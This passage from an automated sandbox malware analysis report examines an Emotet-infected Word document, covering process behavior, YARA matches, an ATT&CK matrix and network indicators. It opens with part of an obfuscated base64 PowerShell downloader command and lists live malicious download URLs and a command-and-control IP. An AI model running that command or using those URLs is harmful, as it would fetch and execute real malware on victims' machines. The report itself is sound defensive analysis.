AJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnAC
                      Source: rundll32.exe, 0000000C.00000002.2345845620.0000000000C40000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: rundll32.exe, 0000000C.00000002.2345845620.0000000000C40000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 0000000C.00000002.2345845620.0000000000C40000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000007.00000002.2124049424.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2135634388.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2345582268.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2161670466.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2168147039.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2125246682.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2124029835.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2345600716.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2144436282.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2134225145.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2158222517.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2346676454.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2144335956.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2145866695.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2158182708.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2168130211.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2173566847.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2134257328.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection112Disable or Modify Tools111OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemorySystem Information Discovery15Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter211Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery11Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptMasquerading21LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 345226 Sample: 68254_2001.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Antivirus detection for URL or domain 2->59 61 Multi AV Scanner detection for dropped file 2->61 63 14 other signatures 2->63 13 cmd.exe 2->13         started        16 WINWORD.EXE 293 24 2->16         started        process3 signatures4 71 Suspicious powershell command line found 13->71 73 Very long command line found 13->73 75 Encrypted powershell cmdline option found 13->75 18 powershell.exe 16 13 13->18         started        23 msg.exe 13->23         started        process5 dnsIp6 45 intellisavvy.com 192.124.249.8, 443, 49168, 49169 SUCURI-SECUS United States 18->45 47 mrveggy.com 177.12.170.95, 443, 49171 IPV6InternetLtdaBR Brazil 18->47 49 4 other IPs or domains 18->49 43 C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll, PE32 18->43 dropped 67 Powershell drops PE file 18->67 25 rundll32.exe 18->25         started        file7 signatures8 process9 process10 27 rundll32.exe 25->27         started        process11 29 rundll32.exe 2 27->29         started        signatures12 77 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->77 32 rundll32.exe 29->32         started        process13 process14 34 rundll32.exe 1 32->34         started        signatures15 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->65 37 rundll32.exe 34->37         started        process16 process17 39 rundll32.exe 9 37->39         started        dnsIp18 51 84.232.229.24, 49179, 80 RCS-RDS73-75DrStaicoviciRO Romania 39->51 53 51.15.7.145, 49184, 80 OnlineSASFR France 39->53 55 2 other IPs or domains 39->55 69 System process connects to network (likely due to code injection or exploit) 39->69 signatures19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      68254_2001.doc47%VirustotalBrowse
                      68254_2001.doc51%MetadefenderBrowse
                      68254_2001.doc76%ReversingLabsDocument-Office.Trojan.Emotet

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll100%Joe Sandbox ML
                      C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll46%MetadefenderBrowse
                      C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll86%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      10.2.rundll32.exe.250000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.3b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.1e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://hbprivileged.comhB0%Avira URL Cloudsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://ummahstars.com0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      https://intellisavvy.com0%Avira URL Cloudsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://hbprivileged.com0%Avira URL Cloudsafe
                      https://intellisavvy.comh0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://intellisavvy.com/wp-admin/dRaG2H/0%Avira URL Cloudsafe
                      https://mrveggy.com/wp-admin/n/0%Avira URL Cloudsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      https://www.teelekded.com/cgi-bin/LPo/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://r3.i.lencr.org/0%0%Avira URL Cloudsafe
                      https://ummahstars.com/app_old_may_2018/assets/wDL8x/100%Avira URL Cloudmalware
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://ketoresetme.com/wp-content/Rk4rz/100%Avira URL Cloudmalware
                      https://theo.digital0%Avira URL Cloudsafe
                      http://intellisavvy.com0%Avira URL Cloudsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://intellisavvy.com/wp-admin/dRaG2H/100%Avira URL Cloudmalware
                      https://mrveggy.com0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://hbprivileged.com/cgi-bin/Qg/100%Avira URL Cloudmalware
                      http://51.15.7.145/mcbf10vnnn8hf/qv9l36h26wgbq5tqf/0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      https://www.teelekded.com/cgi-bin/LPo/P100%Avira URL Cloudmalware
                      https://theo.digital/wp-admin/Zyl2/100%Avira URL Cloudmalware
                      http://ketoresetme.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      hbprivileged.com
                      35.209.96.32
                      truetrue
                        unknown
                        mrveggy.com
                        177.12.170.95
                        truetrue
                          unknown
                          theo.digital
                          35.209.174.246
                          truetrue
                            unknown
                            ummahstars.com
                            35.163.191.195
                            truetrue
                              unknown
                              intellisavvy.com
                              192.124.249.8
                              truetrue
                                unknown
                                ketoresetme.com
                                70.32.23.58
                                truetrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://ketoresetme.com/wp-content/Rk4rz/true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://intellisavvy.com/wp-admin/dRaG2H/true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://51.15.7.145/mcbf10vnnn8hf/qv9l36h26wgbq5tqf/true
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpfalse
                                    high
                                    http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://hbprivileged.comhBpowershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsp.entrust.net03powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://certificates.godaddy.com/repository/0powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.piriform.com/ccleaneNpowershell.exe, 00000005.00000002.2109740274.0000000000364000.00000004.00000020.sdmpfalse
                                        high
                                        https://ummahstars.compowershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://intellisavvy.compowershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://hbprivileged.compowershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://intellisavvy.comhpowershell.exe, 00000005.00000002.2120548704.0000000003BD8000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://intellisavvy.com/wp-admin/dRaG2H/powershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://mrveggy.com/wp-admin/n/powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://investor.msn.com/powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpfalse
                                          high
                                          https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://r3.o.lencr.org0powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.%s.comPApowershell.exe, 00000005.00000002.2110315504.0000000002240000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2135208859.0000000002750000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          https://www.teelekded.com/cgi-bin/LPo/powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://certificates.godaddy.com/repository/gdig2.crt0powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpfalse
                                            high
                                            http://ocsp.entrust.net0Dpowershell.exe, 00000005.00000002.2121616867.000000001B565000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://servername/isapibackend.dllpowershell.exe, 00000005.00000002.2123888696.000000001D2F0000.00000002.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://cps.root-x1.letsencrypt.org0powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://r3.i.lencr.org/0%powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2134527385.0000000001E20000.00000002.00000001.sdmpfalse
                                              high
                                              http://investor.msn.compowershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpfalse
                                                high
                                                http://crl.entrust.net/server1.crl0powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://ummahstars.com/app_old_may_2018/assets/wDL8x/powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://cps.letsencrypt.org0powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://theo.digitalpowershell.exe, 00000005.00000002.2120574374.0000000003C1C000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://intellisavvy.compowershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://certs.godaddy.com/repository/1301powershell.exe, 00000005.00000002.2123409820.000000001CD42000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://certs.godaddy.com/repository/0powershell.exe, 00000005.00000002.2123409820.000000001CD42000.00000004.00000001.sdmpfalse
                                                      high
